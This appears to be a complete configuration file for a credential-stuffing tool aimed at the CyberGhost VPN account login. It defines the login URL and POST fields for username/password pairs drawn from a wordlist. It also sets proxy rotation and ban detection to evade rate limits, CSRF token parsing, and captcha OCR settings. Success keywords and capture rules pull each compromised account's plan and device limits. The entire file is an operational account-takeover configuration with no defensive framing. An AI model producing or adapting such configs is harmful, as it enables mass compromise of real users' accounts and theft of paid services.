[Settings]
SiteURL=https://account.cyberghostvpn.com/en_us/login?
Timeout=20
WaitBot=0
ResolveHost=0
ComboFilter=0
UsernameStart=6
UsernameEnd=8
PasswordStart=6
PasswordEnd=8
ComboMode=0
Letters=0
Digits=0
Alpha=0
Email=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordEmail=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
EmailFilter=0
EmailMode=0
ProxyActivate=10
ProxyRatio=4
ProxyCombo=0
WaitTime=5
BanWindowWidth=1
BanWindowProxies=10
BanWindowRatio=10
blnNoProxies=0
RequestMethod=2
Referer=2
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: https://account.cyberghostvpn.com/en_us/login?|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
POSTData=username=<USER>&authentication=<PASS>&captcha=
[Form]
IAParse=0
LoginPostData=
LoginMethod=1
LoginHeader=0
Action=https://account.cyberghostvpn.com/en_us/proxy/users/me?flags=17&csrf=
Username=username
Password=authentication
Email=
AddData=captcha=
CustomData=
NoIndex=
Cookie=
IAction=-1
IUser=-1
IPass=-1
IEmail=-2
ICaptcha=-1
ReqReferer=
ReqCookie=
AjaxURL=https://account.cyberghostvpn.com/en_us/login?
AjaxPOSTData=
AjaxData=
AjaxParsingCode=
RefData=
ParsingCode=
FormRedirectUrl=
RedPostData=
RedKeys=
DataDesc=<Nine> - Devices&Plan&Max Devices
CaptureParsingCode="activateddevices":"|"|#00|#00|0|#00|#00|0&"internal_name":"|"|#00|#00|0|#00|#00|0&"max_devices":|,|#00|#00|0|#00|#00|0
RefreshSession=0
RefreshCookie=0
FormHeader=0
AjaxHeader=0
RedHeader=0
IAMethod=1
POSTMethod=2
RedMethod=1
ImageAfterAjax=0
blnBasic=0
FollowRedirectsOnIA=0
FollowRedirectsOnRed=1
[Ajax]
Variables=1||Intermediate Action||None||ParsingCode||var CSRF = "|"|#00|#00|0|#00|#00|0||None||None||Username||||-1||-1||0||0||0||0
PostElements2=None&&None&&None&&None&&None&&None&&None&&1&&None&&None&&None&&None&&None&&None&&None
RedURL=
[OCR]
OCRMode=0
URLMode=0
ImageURLID=||
Captcha=
OCRKey=
RefreshCaptcha=0
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnCharTable=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnThreeImages=0
blnGif=0
blnCompute=0
blnBorderPre=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng
[Fake]
AfterFP=0
FollowRedirect=1
EnableConHits=0
Success=3
ConHits=0
EnableConLength=0
SourceTags=1
ConLength=-1
blnSuccess=0
SuccessRetries=3
blnForbToOK=1
ForbToOkLength=1000
blnBadOcrCode=0
BadOcrCodeRetries=3
blnCompleteNot=1
HTTPFollow=1
blnProcessErrors=1
blnInvalidPath=1
UserField=0
[Keywords]
HeaderFail=
HeaderSuccess=
HeaderBan=HTTP/1.1 401 Unauthorized
HeaderRetry=
SourceFail=WRONG USERNAME/PASSWORD
SourceSuccess="internal_name":"Default Free Plan;"internal_name":"Premium Plus
SourceBan=
SourceRetry=
EnableHeaderFail=0
EnableHeaderSuccess=0
EnableHeaderBan=1
EnableHeaderRetry=0
EnableSourceFail=1
EnableSourceSuccess=1
EnableSourceBan=0
EnableSourceRetry=0
EnableGlobalSourceRetry=1
[Wordlist]
UserIndex=1
PassIndex=2
EmailIndex=